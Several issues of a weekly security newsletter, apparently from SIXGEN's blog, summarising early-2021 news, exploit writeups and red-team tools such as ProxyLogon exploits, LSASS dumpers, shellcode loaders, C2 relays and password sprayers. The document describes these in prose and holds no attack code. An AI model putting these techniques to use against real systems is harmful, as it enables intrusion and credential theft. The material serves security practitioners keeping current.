News

• Solo V2 — Safety Net Against Phishing. Everyone knows FIDO2 keys are the best defense against credential phishing, but until now all the solutions have been closed source and expensive. Solokey's Solo V2 looks to change all that with an affordable, NFC capable, open source FIDO2 key. I have no affiliation with Solokey - just a fan of what they are doing. Note: the open source firmware has been audited.
• Sandworm intrusion set campaign targeting centreon systems. In a three year long campaign, Sandworm used webshells and a Linux backdoor to access information technology providers, including web hosting providers. Based on Sandworm's history of targeting industrial control systems, ransomware, and highly public attacks (2018 winter olympics), perhaps this was just an effort to get free redirectors and payload hosting.
• Brave Browser leaks your Tor / Onion service requests through DNS. This isn't the first issue with Tor and Brave (CVE-2020-8276), and likely won't be the last. Mixing Tor and a standard browser is a recipe for disaster.
• Clipping Silver Sparrow’s wings: Outing macOS malware before it takes flight. MacOS specific malware, including an arm compiled variant, uses the old favorite malicious pkg installer to infect victims. MalwareBytes claims it has seen the malware on nearly 30,000 endpoints, while the Red Canary team says it has no evidence the malware has conducted any post-exploitation activities.

Techniques

• Exploiting crash handlers: LPE on Ubuntu. This was a great walkthrough of a complex bug chain that lead to a local privilege escalation. A few different tricks are used to fool the apport crash dump writer into writing a file to an arbitrary location, as root, with arbitrary data. This bug chain affects Ubuntu since the beginning of apport (12.04), so be sure to patch!
• Introducing MacHound: A Solution to MacOS Active Directory-Based Attacks. On an engagement with a large macOS user base and no good way to visualize them in BloodHound? Not anymore! Try MacHound, which uses a Python 3 script run on a macOS host to collect useful data that can be ingested into Bloodhound.
• One thousand and one ways to copy your shellcode to memory (VBA Macros). Most VBA macros reused the same few ways to copy shellcode into memory before executing. This post explores a few "new" ways that are not commonly seen.
• An Unconventional Exploit for the RpcEptMapper Registry Key Vulnerability. @itm4n takes you under the hood of Perfusion and the unconventional process to achieve an exploit exe without the need for compiling custom DLLs, etc.
• Smarty Template Engine Multiple Sandbox Escape PHP Code Injection Vulnerabilities. Template engines are often a source of vulnerabilities. This post explores the smarty template engine for PHP and has practical unauthenticated remote code execution PoCs for popular web apps like TikiWiki.
• COFFLoader: Building your own in memory loader or how to run BOFs. As more and more techniques are written as Cobalt Strike BOFs, you may be wishing your C2 of choice could leverage them? This post explores how to load these COFFs in memory and run them. I am looking forward to a BOF runner library that will work across C2 frameworks so all the hard work put into BOFs can be used everywhere! The PoC is available here
• Farming for Red Teams: Harvesting NetNTLM. While this technique isn't new, the slick productization of it is. The new tools released should help any Red Team struggling with implementing NetNTLM captures after initial compromise.
• Analysis of Cisco AnyConnect Posture (HostScan) Local Privilege Escalation: CVE-2021-1366. AnyConnect had an LPE early last year, but Core Security finds another with a nifty bug chain where the "host scan" feature of the VPN client is abused. A PoC is included - as an image of code for some reason.

Tools and Exploits

• CIMplant is a C# port of WMImplant which uses either CIM or WMI to query remote systems. It allows you to gather data about a remote system, execute commands, exfil data, and more. The tool allows connections using Windows Management Instrumentation, WMI, or Common Interface Model, CIM. CIMplant requires local administrator permissions on the target system. More information in this post.
• endgame is an AWS Pentesting tool that lets you use one-liner commands to backdoor an AWS account's resources with a rogue AWS account - or share the resources with the entire internet. Compared to other AWS offensive tools, endgame have a much wider range of supported services (18 vs 11 for the official AWS Access Analyzer). Of note, the "original" repo (salesforce) and the author's repo (kmcquade) have both been taken down. Sadly, Salesforce has a reputation for this kind of thing.
• pcp is a command line peer-to-peer data transfer tool based on libp2p. It differs from others (like croc) because it uses IPFS instead of a centralized sever.
• AzureC2Relay is an Azure Function that validates and relays Cobalt Strike beacon traffic by verifying the incoming requests based on a Cobalt Strike Malleable C2 profile. Any incoming requests that do not share the profiles user-agent, URI paths, headers, and query parameters, will be redirected to a configurable decoy website. More information in the blog post.
• OffensivePipeline allows you to download, compile (without Visual Studio), and obfuscate C# tools for Red Team exercises.
• Swift-Attack is the macOS equivalent of atomic red team. It contains unit tests for blue teams to aid with building detections for some common macOS post exploitation methods.
• SharpLAPS is a C# executable that will retrieve the LAPS password from the Active Directory. It must be executed from either a Domain Administrator or an account with ExtendedRight or Generic All Rights.

New to Me

This section is for news, techniques, and tools that weren't released last week but are new to me. Perhaps you missed them too!

• trigen is a Python script which uses different combinations of Win32 function calls in generated VBA to execute shellcode. More information here.
• horusec s an open source tool that performs static code analysis to identify security flaws during the development process. Currently, the languages for analysis are: C#, Java, Kotlin, Python, Ruby, Golang, Terraform, Javascript, Typescript, Kubernetes, PHP, C, HTML, JSON, and Dart. The tool has options to search for key leaks and security flaws in all files of your project, as well as in Git history.

This post is cross-posted on SIXGEN's blog.

News

• Unauthorized RCE in VMware vCenter. If you haven't patched your vCenter and it's exposed to the internet (why!?), you may want to start incident response. To make it worse, this unauthenticated RCE gets you SYSTEM on windows based vCenters, and the PhotonOS based Linux appliance is vulnerable to the recent sudo heap overflow. PoCs have dropped.
• Kali Linux 2021.1 Release (Command-Not-Found). The go-to offensive security distro has its first release of 2021. There are a bunch of small updates and new tools, but the coolest new feature is the two new sponsorships (BC Security and ffuf author Joohoi). I like this model that supports open source tool authors!
• Is Your Browser Extension a Botnet Backdoor? Krebs breaks down the "Infatica" residential proxy model that relies on "participating" browser extensions. As more and more sensitive information moves to browsers, extensions will become bigger targets - believe me.

Techniques

• An Exploration of JSON Interoperability Vulnerabilities. Like any standard, there are many ways to parse JSON. When multiple services are used in a product and their parsers differ interesting vulnerabilities can pop up. This post is very thorough, and even has labs for you to follow along and try things out. Very cool.
• A Journey Combining Web Hacking and Binary Exploitation in Real World! The master of unauthenticated remote code execution exploits is back - this time with a full explanation of a PHPWind RCE. This combines web app techniques with classic binary exploitation for shells.
• Pwn2Own Tokyo 2020: Defeating the TP-Link AC1750. A mix of hardware hacking and binary exploitation come together for an unauthenticated root RCE on the LAN side of the TP-Link AC1750 router.
• Infra Automation Primer (Red Team Edition). If you are tired of setting up infrastructure for your red team engagements by hand, this primer will get you started with bash and terraform.
• The difference between Powershell only & process specific AMSI bypasses. If you have ever bypassed Powershell AMSI only to have your loaded .NET blocked, this post explains why and offers a solution.
• Dell EMC OpenManage Server Administrator Authentication Bypass. This "simple" auth bypass cleverly uses the "Manage Remote Node" feature and points it to localhost to bypass auth checks and get a valid, logged-in session cookie.
• Unprotecting Malicious Documents For Inspection. Malicious documents often password protect their VBA code. However, in order for the document to be portable, the hashed password must be in the document as well. If you can find that hash and replace it with a known hash, you now know the password to the VBA!
• CVE-2020-28243 SaltStack Minion Local Privilege Escalation. SaltStack has had some pretty serious vulnerabilities over the years, so this LPE seems quant in comparison, but could give root access to an user on a machine managed by Salt.

Tools and Exploits

• spraygen is a password list generator for password spraying - prebaked with goodies like sports team names, seasons, years, etc.
• BadOutlook is a simple PoC which leverages the Outlook Application Interface (COM Interface) to execute shellcode on a system based on a specific trigger subject line. This can be used to build an Entire C2 Framework that relies on E-Mails as a mean of communication (Where the Implant never speaks to the internet directly).
• 1u.ms is a small set of zero-configuration DNS utilities for assisting in detection and exploitation of SSRF-related vulnerabilities. It provides easy to use DNS rebinding utility, as well as a way to get resolvable resource records with any given contents. A hosted version is available at 1u.ms. You may want to protect the /last and /log endpoints if self-hosting.
• Alaris is not technically a new tool (LWiS 2020-10-19), but it has had a major update to use direct syscalls with SysWhispers2, a new builder, and new dynamic encryption primitives.
• redbean - single-file distributable web server. This is both a zip file that contains all content that is served and a truly cross platform (Windows, Linux, MacOS, and BSD) binary webserver. This may be actual magic.
• Callback_Shellcode_Injection contains POCs for shellcode injection via callbacks. These uncommon API calls are likely much less monitored than standard methods of shellcode injection (although they still use VirtualAlloc).
• goc2 is a new macOS post exploitation C2 framework. Pairs with goc2-agent.
• Omnispray aims to replace tools such as o365spray and provide a modular framework to expand enumeration and spraying beyond just a single target/application.

New to Me

This section is for news, techniques, and tools that weren't released last week but are new to me. Perhaps you missed them too!

• pillager is designed to provide a simple means of leveraging Go's strong concurrency model to recursively search directories for sensitive information in files. Once pillager finds files that match the specified pattern, the file is scanned using a series of concurrent workers that each take a line of the file from the job queue and hunt for sensitive pattern matches. The available pattern filters can be defined in a rules.toml file or you can use the default ruleset.
• LsassSilentProcessExit is a new method of causing WerFault.exe to dump lsass.exe process memory to disk for credentials extraction via silent process exit mechanism without crashing lsass.exe.

This post is cross-posted on SIXGEN's blog.

News

• ProxyLogon. The big news of last week was the unauthenticated remote command execution as SYSTEM on Microsoft Exchange servers that only had port 443 open. This bug chain is impressive, and it was originally found by Orange Tsai of DEVCORE, but exploited by an alleged Chinese APT like crazy in the past few weeks. Two things stand out: 1. Orange Tsai and team went from "Let's look at Exchange" to unauth RCE in 3 months, and 2. Somewhere along the discovery and reporting chain, the bug was likely stolen or leaked. While possible, it is unlikely the APT using this 0day discovered it in parallel with Orange Tsai and then started using it only after it was reported to Microsoft. Further speculation is up to the reader - Krebs has a a basic timeline of the exchange mass-hack.
• Cobalt Strike 4.3 – Command and CONTROL. Industry's favorite commercial command and control framework got an update with a big focus on DNS beacons. While direct support for DNS over HTTPS wasn't included, it is possible to shim it in using lookups to localhost and cloudflared. Full changes in the release notes.
• Raphael’s Transition. In other Cobalt Strike news, Raphael Mudge is stepping down after nearly a decade of work on Armitage and Cobalt Strike. It's inspiring to see someone take a good idea dreamt up during a CTF and turn it into a successful business. Enjoy your next adventure Mudge, you've earned it!
• Fast Factoring Integers by SVP Algorithms. I almost didn't include this as the findings have not been demonstrated let alone proven, but "this destroys the RSA cryptosystem" is one hell of a way to end your paper's abstract. I'll be keeping an eye on this one, but don't bump replacing RSA up on your priority list quite yet. Another researcher has implemented the algorithm, and it isn't the RSA destroyer claimed.
• Xerox lawyers prevent con talk. Sadly this is still a thing in 2021. The researcher found bugs in Xerox multifunction printers and responsibly disclosed them, only to have Xerox sic their lawyer hounds on him. The bug descriptions (no PoCs) are available at Airbus security lab publications.

Techniques

• Anatomy of an Exploit: RCE with CVE-2020-1350 SIGRed. The SIGRed exploit is an unauthenticated RCE against domain controllers running DNS (on by default) using a malformed DNS SIG response. This is a complete walkthrough of the exploit, plus the first (I believe) public PoC..
• Google Update Service being a scum. Windows 10 2009 and later allows for authenticated users to write to the root of C:\. Google Chrome's update service checks for a configuration file at C:\GoogleUpdate.ini. Options in this file can be used to take over arbitrary files on the system. Pair this with UsoDllLoader and get SYSTEM! This bug was reported and closed as "WontFix" since it "requires physical access to a user's machine" (???) and thus will live on.
• How to execute an object file: Part 1. Like COFFLoader (LWiS 2021-02-22), this post explores how to load a compiled but not linked object file. This post focuses on Linux, so if you need Cobalt Strike BOF loading in your post exploitation tool, check out COFFLoader.
• Emails Disclosure on WordPress. Gravatar avatars are MD5 hashes of emails, which in many cases are trivial to brute force, exposing email addresses of site users and admins.
• Deception Engineering: exploring the use of Windows Service Canaries against ransomware. Ransomware commonly will force services related to AV and backups to stop before encrypting files, so the idea behind KilledProcessCanary is to alert when any machine in your network has two or more of these fake services stopped. Want to go deeper into this kind of detection? Outflank published catching red teams with honeypots part 1: local recon this week as well.
• Tap tap… is this thing on? Creating a notification-service for Cobalt-Strike. There is nothing worse than coming back to a teamserver only to see a new beacon that has been calling back for hours with no actions taken. Jean-Francois also handles the sessions problem by providing a headless version that will outlive a disconnected Cobalt Strike GUI.

Tools and Exploits

• universal - This loader provides a unified Go interface for loading shared libraries from memory on Windows, OSX, and Linux. Also included is a cross-platform Call() implementation that lets you call into exported symbols from those libraries without stress. This is a work of art, a universal loader without any C code, or calls to memfd, that even works on the M1 macs. Bravo.
• Syscall_PE_Loader.cs is a C# PE cradle with DInvoke Syscalls to avoid hooking and sleeps for the DLL imports. Both trigger a scan, so doing only one won't help. Only needs an amsi.dll patch bypass before using to complete the EDR/AV bypass trifecta. However, apparently simply compiling your own unchanged Cobalt Strike artifact kit is enough to bypass defender.
• SaltStack API vulnerabilities. Just last week we discussed the local SaltStack Minion Local Privilege Escalation, but this is reprise of the RCE from last year. "It took a few hours total to find these after looking at patches for the last set of vulnerabilities." Patches can be goldmines for finding similar, unpatched bugs!
• Wubes is like Qubes but for Windows. The idea is to leverage the Windows Sandbox technology to spawn applications in isolation. It currently supports spawning a Windows Sandbox for Firefox.
• ipv6-df-3.c is a FreeBSD 9 PoC of the SOCK_RAW vulnerability. Why would this matter? The PS4 runs a modified FreeBSD 9 kernel. More information here.
• CVE-2021-23132 is a Joomla core (<= 3.9.24) vulnerability in com_media allowed paths that are not intended for image uploads which leads to RCE. This is an authenticated RCE that requires an admin account.
• EDRs contains information about EDRs and the functions they hook in ntdll.dll that can be useful during red team exercise.

New to Me

This section is for news, techniques, and tools that weren't released last week but are new to me. Perhaps you missed them too!

• DT_RPATH. On Linux machines, LD_PRELOAD has been the go-to for userland "rootkits" that hook every process. However, the lesser known DT_RPATH can achieve similar results.
• packetStrider for SSH is a packet forensics tool that aims to provide valuable insight into the nature of SSH traffic, shining a light into the corners of SSH network traffic where golden nuggets of information previously lay in the dark. Point it at a pcap and it can tell you things like if host keys were ignored, command line flag usage, and if a session was automated or interactive. Very cool.

This post is cross-posted on SIXGEN's blog.

News

• Proxylogin fallout

  • Reproducing the Microsoft Exchange Proxylogon Exploit Chain. If you're wondering how hard it would be to generate an in-house version of Proxylogon using just the patches and public information, look no further. This post is full of technical details and the steps the Praetorian team took to recreate the exploit chain. This is an excellent resource for aspiring n-day writers. A PoC based on this article is available on Github.
  • metasploit_gather_exchange is a metasploit framework module for gathering information from an Exchange Server via powershell to list and export mailboxes as pst files. Details in this blog post.
  • One-Click Microsoft Exchange On-Premises Mitigation Tool – March 2021. This official tool from Microsoft shows the severity of the issue. Unfortunately it is very likely too late for any vulnerable instances. I suppose if there was suspicion that Microsoft somehow leaked the exploit I would be trying to make it easy to mitigate the vulnerabilities too...

• Bloodhound Enterprise. From the creators of BloodHound, a SaaS technology that continuously identifies and quantifies the most critical Active Directory choke points. Measurable, practical remediation guidance enables the elimination of millions of attack paths within your existing Active Directory architecture. The product is scheduled for release this summer (2021) and I am excited to see it help organizations lock down their AD environment.
• OVH data centre destroyed by fire in Strasbourg – all services unavailable. This is your weekly reminder that the cloud is just someone else's computer. Backups still matter!
• Introducing sigstore: Easy Code Signing & Verification for Supply Chain Integrity. Let's Encrypt but for code signing. Most importantly: "sigstore will be free to use for all developers and software providers, with sigstore’s code and operation tooling being 100% open source." This is a good step that I hope lots of developers use. Imagine being able to subscribe to a monitor service for all the dependancies in your project. The transparency may also provides an OSINT opportunity for red teams. You can monitor the progress of the tools on GitHub.
• A Hacker Got All My Texts for $16. A layered network of providers eventually allows the complete re-routing of SMS messages, with no verification or notification to the end user (since fixed by the one provider tested). The fact that 3 separate companies were involved means that there are APIs that allow this with no verification. What would it take for an attacker to either find a new provider that does not do verification or create their own to gain access to the APIs? If a services offers app based (or better, hardware key based) multifactor authentication, choose it over SMS every time.
• Who Can Find My Devices? Security and Privacy of Apple’s Crowd-Sourced Bluetooth Location Tracking System. This report on the closed source tracking system (and upcoming AirTags) that will help locate lost devices by using every Apple device with Bluetooth as a global sensor has some flaws. However, it's clear that care was taken in the design to preserve privacy more so than other similar systems (e.g. Tile). Don't want to wait for AirTags? Build your own now using openhaystack. Due to the private design of the Apple system, it will be hard (impossible?) to prevent this kind of third party use.
• Introducing ThreatFox. ThreatFox is a community driven project from the creator of abuse.ch and MalwareBazaar where security researchers and threat analysts can share indicators of compromise (IOCs) with the infosec community for free, and without the need of a registration.
• Whitelist Me, Maybe? “Netbounce” Threat Actor Tries A Bold Approach To Evade Detection. Imagine being so confident in your malware, you email it directly to one of the 2 vendors that have marked you malicious in VirusTotal and ask to be whitelisted. No such luck this time, but how many times has it worked?
• A Spectre proof-of-concept for a Spectre-proof web. It's pretty wild that the Google team managed to get Spectre working via Javascript in a sandboxed browser, but perhaps the most interesting bit of this post is, "in our tests the attack was successful on several other processors, including the Apple M1 ARM CPU, without any major changes."

Techniques

• Reproducing n-day vulnerabilities and writing N-day based fuzzer with Qiling. The techniques in this post can be used to start your own fuzzing, and the existence of one bug means more could be hiding in adjacent functions.
• Code execution in Wireshark via non-http(s) schemes in URL fields. Ever wanted to phish a defender or incident responder? Some protocol handlers in Wireshark can be used to get 1-click remote code execution.
• Technical Advisory: Dell SupportAssist Local Privilege Escalation (CVE-2021-21518). DLL hijacking will likely never die on Windows, and this post shows how it can be exploited for local privilege escalation. This specific vulnerability only affects systems with Dell SupportAssit 3.7 or greater distributed in a 3 month window in the fall of 2020.
• VM Detection Tricks, Part 2: Driver Thread Fingerprinting. Grahm Sutherland is back with another VM detection trick, this time a way to use tread information to detect if HyperV's vmbus driver is loaded. This technique could be used generally to detect any driver that spawns multiple threads without any suspicious queries. The PoC is on github.
• Dumping the Sonos One smart speaker. Getting root shells on IoT hardware via UART and JTAG: tired. Getting shells via PCI direct memory access attacks: wired. Using the wifi card's mini-PCI connection David Berard is able to not only dump the running kernel, but modify it to get a shell.
• Abstracting Scheduled Tasks. How many ways are there to schedule tasks on Windows? Lots.

Tools and Exploits

• git: malicious repositories can execute remote code while cloning. As someone who clones a lot of git repos, this one is personal. From the advisory: On case-insensitive filesystems, with support for symbolic links, if Git is configured globally to apply delay-capable clean/smudge filters (such as Git LFS), Git could be fooled into running remote code during a clone. Update your git clients! Windows has LFS enabled by default and is vulnerable (other OSs have to enable LFS). This is also not the first git LFS vulnerability (see CVE-2020-27955).
• Three distinct vulnerabilities discovered by GRIMM while researching the Linux kernel combine as LPE. A kernel pointer leak plus a heap buffer overflow allows for local privilege escalation on modern Linux (RHEL 8.1-8.3).
• RunDLL.Net is a project to execute .Net assemblies using Rundll32.exe.
• FOLIAGE. This is an interesting project that implements a DNS-over-HTTPS persistence stager with memory obfuscation a la gargoyle. This project uses NtContinue as the "gadget" which gets around argument limits to manipulate the return address to NtTestAlert() which allows the code to run the next time it is called.
• DisablePPLDriverPoc is a custom driver to disable protected process light and dump lsass. The driver is not signed, so it must be loaded via a driver signing bypass to work.

New to Me

This section is for news, techniques, and tools that weren't released last week but are new to me. Perhaps you missed them too!

• cosmonim is a simple example to show how can you use cosmopolitan with Nim. Could this be used to write the ultimate cross platform dropper for those cases where an exploit could land you on a Windows or Linux machine?
• ebpfsnitch is a Linux Application Level Firewall based on eBPF and NFQUEUE. It is inspired by opensnitch and Douane but utilizing modern kernel abstractions - without a kernel module.
• http_bridge is a client that allows for socks5 proxying over standard HTTP verbs (no CONNECT) through a Linux server running PHP. Similar to Cloak.
• Go-RouterSocks managing multiple chisel sessions can be a pain. This tool exposes a single socks5 proxy port, and allows dynamic routing of networks to specific chisel sessions.

This post is cross-posted on SIXGEN's blog.

News

• Lending a hand to the community – Covenant v0.7 Updates. It's great to see a community project like Covenant get contributions from the companies using it on assessments.
• How we found and fixed a rare race condition in our session handling. You probably had to log back into GitHub last week, and this explains why. A rare race condition could have returned data from another user's session.
• Azure Key Vault - Intermittent failures - Mitigated (Tracking ID 5LJ1-3CZ). The 14 hour O365 outage last Monday was caused by key rotation during "complex cross-cloud migration."
• RCE in Google Cloud Deployment Manager. This bug netted a total of $164,674 for the researcher - the highest single-bug award I can recall. Well done!
• In-the-Wild Series: October 2020 0-day discovery. Google Project Zero discovered seven (!) 0days being actively used in the wild as part of a watering hole campaign against Android, Windows, and iOS devices.
• New macOS malware XcodeSpy Targets Xcode Developers with EggShell Backdoor. With echos of XcodeGhost from 2015, a malicious Xcode project included a script in the build processes to install a backdoor on the developer's machine. This feels very similar to the campaign targeting security researchers from January 2021.
• Facebook's ‘Red Team X’ Hunts Bugs Beyond the Social Network's Walls. Now this is a good red team scope! Any tech the company relies on can be tested by 'Red Team X.'
• Signal secure messaging app stops working in China. Surprised it took this long.

Techniques

• Malware development part 8. COFF/BOF loaders are all the rage right now. This post walks through another implementation of a stand-alone COFF (and thus BOF) loader. If you haven't put a BOF loader in your in house remote access tool, you are missing out on lots of community developed capabilities. The resulting COFFInjector code is available and can be used as a reference.
• Deception Engineering: exploring the use of Windows Installer Packages against first stage payloads. Ransomware and other "loud" malware likes to try to uninstall any AV/EDR product as one of the first steps after execution. UninstalledAppCanary detects this by installing a product called "Security" (sure to hit some wildcards) and alerts you to a possible incident if it is uninstalled.
• MobileIron MDM Contains Static Key Allowing Account Enumeration. Encryption and key management is hard, which is why some vendors will hardcode a key as a way to have encryption without the headache of key management. As soon as this key is discovered however, anything it protects is no longer safe. rustyIron is a tool that can leverage this for discovery and more. Hey, at least it wasn't RCE this time?
• The most common on premises vulnerabilities & misconfigurations. I love these kinds of posts. So much knowledge packed into a few thousand words. Don't skip this one, there is sure to be at least one new thing in it for you.
• Beyond the good ol' LaunchAgents. This full series on macOS persistence is great stuff.
• Investigating .NET CLR Usage Log Tampering Techniques For EDR Evasion. Running C# or other CLR-based tools leaves usage logs which can be used by AV/EDR or blue teams to detect red team actions. This post goes over what is in these logs, and a few potential ways to stop them from ever being written in the first place.

Tools and Exploits

• CredBandit. This BOF is the culmination of many great projects, and allows you to dump process memory using direct syscalls and a custom MiniDumpWriteDump adapted from ReactOS, all without having the dump touch disk, transferring it back via a BeaconPrintf hack. Hopefully this kind of workaround won't be required in the next version of Cobalt Strike. It would be great to have a way to send arbitrary data back to a teamserver in a BOF.
• bloodhound-quickwin is a simple script to extract useful informations from the combo BloodHound + Neo4j. It can help to choose a target for follow on actions.
• xeuledoc can fetch information about any public Google document (doc, sheet, slide, map, drawing, etc).
• Lepus3 is a subdomain finder with various API integrations. Learn more in the post: Reviving and Refactoring DNS Enum.
• Add exploit for CVE-2021-1732. The Windows 10 local privilege escalation vulnerability discovered in the wild is now in metasploit - but nothing is stopping you from modifying this code for use in your own framework/tool.
• dnsfwd is a DNS forwarder that only forwards queries for the domains you specify to an upstream host. This is useful for things like DNS beacons where you only want to send beacon related traffic to Cobalt Strike.

New to Me

This section is for news, techniques, and tools that weren't released last week but are new to me. Perhaps you missed them too!

• grex is a command-line tool and library for generating regular expressions from user-provided test cases. All you do is give it examples of strings to match and it will generate a regular expression that matches all of them. A great tool for getting a good start on a tough regex.
• CredMaster is a refactored & improved CredKing password spraying tool that uses FireProx APIs (AWS) to rotate IP addresses, stay anonymous, and beat throttling. More details here.
• SecurityTips is a collection of "HackerScrolls" tips, cheatsheets, and mindmaps.
• terraformer is a CLI tool to generate terraform files from existing infrastructure (reverse Terraform). Infrastructure to Code

This post is cross-posted on SIXGEN's blog.

News

• Securing our approach to domain fronting within Azure. The last of the major cloud services is killing domain fronting, thus further reducing the number of domains possible to front behind. Fastly is about to see some new customers. With Encrypted Client Hello (ECH) on the horizon, there is hope for a new kind of "fronting".
• Changes to Git commit workflow. A tame title to an alarming update about an attacker with access to git.php.net that was committing backdoors to the php codebase. Good on php for catching this very quickly. How many projects has this happened to and no one has noticed? Does your app depend on those projects?
• Microsoft Applications Bounty Program. Microsoft launches a new bounty program focused on apps. Perhaps in response to the "Important, Spoofing" RCE in Teams from December 2020?
• Encrypted Phone Firm Encrochat Used Signal Protocol. The signal protocol remains unbroken, even by law enforcement. The end user devices however...

Techniques

• House of Mind - Fastbin Variant in 2021. This post (re)introduces GLibC heap exploitation method that works across all versions of the heap allocator and gives a write-what-where primitive. This is dense exploit development content.
• APT Encounters of the Third Kind. Easily the best article of the week. Igor goes from noticing a discrepancy between his test setup and production pcap time vs packet counts to uncovering an in-memory only APT backdoor. If you are wondering what a real advanced persistent threat looks like, this is it.
• SAML XML Injection. If you're testing an app with SSO abilities based on SAML, be sure to read this post.
• PhishCatch: Detecting password reuse from the inside out. By hashing enterprise passwords and storing them locally, and hashing all passwords to compare, this Chrome extension can detect password reuse without compromising any credentials.
• Recovering a full PEM Private Key when half of it is redacted. In just a few hours the wizards of the cryptohack Discord server managed to recover a RSA private key from a partially redacted screenshot. "Whether it’s a single bit leaking with Ladder Leak, or pieces of primes for a Coppersmith attack, partial information exposure of cryptographic private keys is often enough to totally break the crypto protocol. If you find something private, keep it that way."
• Bypassing conditional access by faking device compliance.. This guide shows two different ways to make a device compliant in Microsoft InTune, even if you spoof it as a Commodore64.
• Dumping LSASS in memory undetected using MirrorDump. Using boo and avoiding the classic dumping technique of calling OpenProcess, MirrorDump instead registers as a "legitimate" authentication provider with Windows and uses a handle to itself (lsass.exe) to do the dumping.

Tools and Exploits

• Keep Malware Off Your Disk With SentinelOne’s IDA Pro Memory Loader Plugin. Download files straight from VirusTotal into memory and open in IDA Pro without writing them to disk. Neat!
• ZoomPersistence is an aggressor script and C++ shim to persist as Zoom on a Windows system by moving the user's zoom binary and replacing it with a shim.
• gitrecon is an OSINT tool to get information from a Github or Gitlab profile and find user's email addresses leaked on commits.
• malware_training_vol1 is a work in progress repo of materials for Windows Malware Analysis training (volume 1).
• PoisonApple is a command-line tool to perform various persistence mechanism techniques on macOS. It's missing a few from the new Beyond the good ol' LaunchAgents series, but has others not covered there.

New to Me

This section is for news, techniques, and tools that weren't released last week but are new to me. Perhaps you missed them too!

• graphtage is a command-line utility and underlying library for semantically comparing and merging tree-like structures, such as JSON, XML, HTML, YAML, plist, and CSS files. This is sure to be useful in a shell script at some point.

This post is cross-posted on SIXGEN's blog.

News

• Phone numbers for 533 million Facebook users leaked on hacking forum. The data is from a 2019 scrape that abused the contact import feature, and has been circulating in private since then. Now however, anyone who knows your name can look up the phone number used to register your facebook account.
• Whistleblower: Ubiquiti Breach “Catastrophic”. Despite the initially downplayed public statement in January, an insider claims the attacker "gained root administrator access to all Ubiquiti AWS accounts, including all S3 data buckets, all application logs, all databases, all user database credentials, and secrets required to forge single sign-on (SSO) cookies." Ubiquiti has since issued a new statement that did not dispute any of the facts and hinted the perpetrator may have been an insider, or "an individual with intricate knowledge of our cloud infrastructure."
• Our reasoning for Outflank Security Tooling. Outflank, a well known top-tier adversary simulation firm out of the Netherlands, is offering its in-house offensive toolset for a yearly license of €40,000. I agree with their thesis that effective red teams now have to be excellent developers/R&D practitioners and that was not the case 5 or more years ago. Hopefully this business model is sustainable - I think it will be. More details on the product page.
• Update on campaign targeting security researchers. The North Korean actors that targeted security researchers with malicious project files in January 2021 have stood up a new potential watering hole. In this case, Google's Threat Analysis Group was able to notice before the site could host any malicious content.
• Google LLC v. Oracle America, Inc.. "The Court ruled that Google's use of the Java APIs was within the bounds of fair use, reversing the Federal Circuit Appeals Court ruling and remanding the case for further hearing." While it isn't a total victory (it didn't rule that APIs couldn't be copyrighted), it's still a win.
• Community API. Greynoise has been a useful tool for SOCs to determine if the traffic they are seeing is legitimate attacks or just noise like known scanners. Now there is a free to use community API!

Techniques

• How to execute an object file: Part 2. This post picks up where the last one left off and expands the loader to handle static constant data and global variables.
• Man in the Terminal. On Linux or macOS targets, PATH variable manipulation can allow your program to be executed before the actual program the user invokes, allowing you to shim it and retrieve credentials and other sensitive information. A proof of concept shim called cliProxy is available. A simple improvement would be for cliProxy to automatically detect the program it is invoked as and search the real PATH for that binary to proxy. That way you could compile once, and deploy for many target binaries.
• HookDump. By using LoadLibrary and reading the DLL from disk, HookDump can compare the exported functions to detect hooks with low (or no?) false positives. Grab the code on GitHub.
• Safe code & pitfalls: DLL side-loading, WinAPI and C++. DLL side-loading is a common persistence technique, but it can be difficult to write the "remediation" section of a report that finds usable DLL side-loading on an app assessment. This is the best blog I have found that provides technical details on how to prevent side-loading in C++.
• Three ways of using MSBuild to beat CrowdStrike. MSBuild has been a favorite LOLBin for years now, and it still is undetected in many cases!
• The Power of SeImpersonation. Just when you thought there couldn't possibly be any more potato exploit variants another one drops. This new variant focuses on the ability to respond to HTTP requests or named pipe write. The code is available as GenericPotato.
• This man thought opening a TXT file is fine, he thought wrong. macOS CVE-2019-8761. Textedit is the notepad.exe of macOS and it will render HTML for you without asking. Using some iframedoc and style magic, even without javascript Paulos is able to exfil data. Impressive work! I always run defaults write com.apple.TextEdit RichText -bool false on a new mac to prevent the rich text rendering anyway, now it's a security hardening feature.
• PageBuster: stealthily dump all the code ever executed. This tool can dump all executable pages from memory which is great for things like analyzing packed malware in a sandbox vs reverse engineering the packer and unpacking it by hand.

Tools and Exploits

• PMapper is a script and library for identifying risks in the configuration of AWS Identity and Access Management (IAM) for an AWS account or an AWS organization. It models the different IAM Users and Roles in an account as a directed graph, which enables checks for privilege escalation and for alternate paths an attacker could take to gain access to a resource or action in AWS.
• random_c2_profile is a project designed to generate malleable c2 profiles based on the reference profiles here. This makes totally random profiles, so you may want to manually make it less random.
• WordlistSmith is a tool to quickly scrape a website and generate a wordlist and is multithreading capable.
• CheeseRDP is a single C# binary that can be run via .NET Reflection and will inject into mstsc.exe to steal RDP credentials. No need to drop a DLL to disk!
• SharpProxyLogon is a fully featured exploit for ProxyLogon (the Exchange RCE chain) that can either drop a webshell or inject shellcode into svchost.exe as SYSTEM.
• X-Commander is an easy-to-use python tool for attacking MySQLX or XDevAPI, brute forcing and querying.
• innernet is a private network system that uses WireGuard under the hood. While WireGuard is awesome, it's just a really good VPN and nothing more. Innernet looks to solve some of the comfort issues with WireGuard. The announcement blog post has the details.

New to Me

This section is for news, techniques, and tools that weren't released last week but are new to me. Perhaps you missed them too!

• caronte is a tool to analyze the network flow during capture the flag events of type attack/defense. It reassembles TCP packets captured in pcap files to rebuild TCP connections, and analyzes each connection to find user-defined patterns.

This post is cross-posted on SIXGEN's blog.

News

• Israel appears to confirm it carried out cyberattack on Iran nuclear facility. Stuxnet 2.0? Lots of hot takes on "infosec twitter." As I am not an expert in international relations, nuclear policy, diplomacy, or the role of cyber operations in any of the above I have no such hot takes.
• Pwn2Own 2021 - Schedule and Live Results. Lots of good exploits were shown at the latest Pwn2Own competition. Highlights: 0-Click Zoom RCE, Teams RCE, and five (!) Windows local privilege escalations.
• Signal Adds a Payments Feature—With a Privacy-Focused Cryptocurrency. I worry that this is scope creep on a grand scale. While signal still requires phone numbers for signup, they are busy implementing a venture capital backed and 100% pre-mined cryptocurrency (that Signal CEO Moxie is the CTO for)? Some have come to Signal's defense, but I'm not convinced this is a good move. You either die a hero, or live long enough to see yourself become the villain.

Techniques

